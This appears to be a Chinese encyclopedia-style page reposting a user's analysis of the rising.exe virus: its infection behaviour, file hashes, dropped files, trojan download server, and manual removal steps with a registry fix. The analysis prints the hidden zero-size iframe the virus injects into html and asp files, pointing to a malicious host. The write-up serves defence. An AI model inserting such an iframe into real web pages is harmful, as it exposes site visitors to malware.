rising.exe

病毒簡介

前幾天中了一個這病毒, 在網上找到了解決方法,發出來和大家一起分析一下。該病毒主要破壞功能有:

rising.exerising.exe

1.感染exe 並使得被感染的exe的公司等屬性變為“番茄花園”
2.感染html asp 等檔案 插入惡意代碼
3.通過雙擊磁碟啟動
4.下載木馬,盜取網遊帳號
5.修改註冊表,使系統無法顯示隱藏檔案
6.通過hook API 函式導致任務管理器中無法看見其進程!(這點十分可惡)!

分析報告

File: rising.exe
Size: 64775 bytes
File Version: 1.00
MD5: 86311B37D938BB35645E7B092014DD63
rising.exerising.exe

SHA1: 47C324A5A691DD31DC0410E51ADBD35065E6C7C3
CRC32: 88ABBD9B rising.exe 運行後 首先釋放一個rising.eve的檔案 然後由rising.exe啟動他
之後 釋放139CA82A.EXE 139CA82A.dll(隨機的8個數字字母組合成的檔案名稱)到系統資料夾
註冊服務139CA82A.EXE
139CA82A.EXE控制winlogon進程 使得139CA82A.dll插入幾乎所有進程
釋放rising.exe 和autorun.inf 到每個分區,使得雙擊磁碟啟動
感染除系統分區外的exe檔案 使得其公司名全變為番茄花園
感染 html asp 等檔案 在其後面插入代碼
<iframe src="http://web.yulett.cn/count.htm" width="0" height="0" frameborder="0"></iframe>
修改系統時間 隨機把年份往前調 月,日不變
修改 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue:
值為 0x00000000
導致無法顯示臨時檔案
rising.exe 還會hook 多個 API函式 使其進程在任務管理器中隱藏
使用Explorer.exe連線網路 61.152.92.98:80下載木馬
下載的木馬一般為K117815XXXXX.exe
XXXXX代表隨機
到系統資料夾
由於 每台機器上下載的木馬的名稱不同 但最後結果相同 所以中間釋放的過程省略
最後 這些木馬運行後分別釋放了如下檔案
C:\WINDOWS\system32\buchehuo.exe(創建了服務inetsvr)
C:\WINDOWS\system32\cmdbs.dll
C:\WINDOWS\cmdbs.exe
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\system32\mppds.dll
C:\WINDOWS\mppds.exe
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\msccrt.exe
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\winform.exe
C:\WINDOWS\system32\winsock.exe
臨時資料夾下 釋放upxdnd.exe和upxdnd.dll
解決辦法:
安全模式下(開機後不斷 按F8鍵 然後出來一個高級選單 選擇第一項 安全模式 進入系統)
首先把系統日期 改回來
然後打開sreng
啟動項目 註冊表 刪除如下項目
<upxdnd><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\upxdnd.exe> []
<msccrt><C:\WINDOWS\msccrt.exe> []
<cmdbs><C:\WINDOWS\cmdbs.exe> []
<mppds><C:\WINDOWS\mppds.exe> []
<Kvsc3><C:\WINDOWS\Kvsc3.exe> []
<winform><C:\WINDOWS\winform.exe> []
“啟動項目”-“服務”-“Win32服務應用程式”中點“隱藏經認證的微軟項目”,
選中以下項目,點“刪除服務”,再點“設定”,在彈出的框中點“否”:
139CA82A / 139CA82A
Wireless Zero Conflguration / inetsvr
把下面的 代碼拷入記事本中然後另外儲存為1.reg檔案
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"
雙擊1.reg把這個註冊表項導入註冊表
然後雙擊我的電腦-工具-資料夾選項-查看-顯示所有檔案和資料夾,把“隱藏受保護的系統檔案”的勾去掉。
右鍵 點擊C糟 點擊右鍵選單中的“打開”打開C糟 (千萬不要雙擊)
刪除 如下檔案
C:\rising.exe
C:\autorun.inf
C:\WINDOWS\system32\buchehuo.exe
C:\WINDOWS\system32\cmdbs.dll
C:\WINDOWS\cmdbs.exe
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\system32\mppds.dll
C:\WINDOWS\mppds.exe
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\msccrt.exe
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\winform.exe
C:\WINDOWS\system32\winsock.exe
C:\WINDOWS\unspapik.txt
C:\WINDOWS\wiasevct.txt
C:\WINDOWS\wiasvctr.txt
C:\WINDOWS\ganran.txt
C:\WINDOWS\system32\139CA82A.DLL(隨機的8個數字字母組合成的檔案名稱)
C:\WINDOWS\system32\139CA82A.EXE(隨機的8個數字字母組合成的檔案名稱)
C:\WINDOWS\system32\K117815XXXXX.exe(XXXXX代表隨機數字)
清空C:\Documents and Settings\用戶名\Local Settings\Temp
右鍵 點擊分別打開系統分區以外的分區 還是點擊右鍵選單中的“打開” (千萬不要雙擊)
刪除每個分區下面的autorun.inf和rising.exe檔案;
最後用防毒軟體全盤掃描。

相關詞條

相關搜尋

熱門詞條

聯絡我們